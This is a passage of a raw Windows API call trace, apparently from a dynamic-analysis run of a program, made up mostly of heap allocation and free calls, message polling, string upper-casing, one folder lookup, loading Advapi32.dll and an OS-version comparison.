RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0267.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0267.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0267.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0267.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0267.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0267.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0267.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0267.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0267.939] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0267.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0267.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0267.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0267.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0267.939] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0267.939] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.939] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0267.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0267.940] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0267.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0267.940] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0267.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0267.940] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0267.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0267.940] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures/Sample Pictures", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa1c0047, dwReserved1=0x2aca2, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 0xaa5860 [0267.940] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0267.941] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0267.941] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0267.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0267.941] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0267.941] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0267.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0267.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0267.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0267.941] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0267.941] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.941] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0267.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0267.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0267.942] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.942] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0267.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0267.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0267.942] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.942] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.942] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0267.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0267.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0267.942] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0267.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0267.942] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0267.943] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0267.943] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0267.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0267.943] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0267.943] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0267.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0267.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0267.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0267.943] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0267.943] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.943] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0267.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0267.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0267.944] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.944] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0267.944] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0267.944] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0267.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0267.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0267.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.944] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0267.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0267.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0267.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9db0 [0267.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0267.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0267.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0267.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0267.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0267.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0267.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0267.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0267.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0267.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0267.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0267.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0267.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0267.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0267.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0267.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0267.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0267.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0267.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0267.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0267.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.946] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0267.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0267.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0267.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0267.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0267.946] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0267.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.946] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0267.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0267.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0267.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0267.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0267.947] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0267.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0267.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0267.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0267.947] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0267.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0267.947] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0267.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0267.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0267.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0267.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0267.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0267.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0267.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0267.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0267.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0267.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0267.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0267.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0267.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0267.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0267.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0267.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0267.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0267.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0267.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0267.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0267.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0267.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0267.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0267.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0267.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0267.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0267.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0267.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0267.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0267.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 